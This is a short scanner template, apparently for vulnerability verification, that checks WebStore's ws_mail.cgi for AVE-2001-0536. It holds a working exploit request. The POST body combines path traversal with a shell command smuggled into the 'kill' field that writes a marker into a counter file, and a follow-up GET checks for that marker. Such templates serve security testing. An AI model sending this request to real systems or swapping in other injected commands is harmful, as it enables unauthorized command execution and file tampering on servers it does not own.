[info]
author = "ave"
description = "AVE-2001-0536 verification"
id = "POC-AVE-2001-0536"
name = "PoC for AVE-2001-0536"
severity = "medium"
tags = ["ave-2001-0536"]
vuln_id = ["AVE-2001-0536"]

[poc]
logic = "any"

[[poc.requests]]
method = "POST"
path = "/{{BaseURL}}/cgi-bin/ws_mail.cgi"
protocol = "http"

[poc.requests.body]
content = "userfile=..%2FStatistics%2FWebStore_Access.counter&kill=55555%3Becho+VULNERABLE+%3E+..%2FStatistics%2FWebStore_Access.counter&terminate=whatever&admin=yep&restart=pls&msgfile=..%2F..%2FStatistics%2FWebStore_Access.counter"
type = "form"

[[poc.requests.matchers]]
expect = true
part = "status"
status = [200]
type = "status"

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/Statistics/WebStore_Access.counter"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["VULNERABLE"]
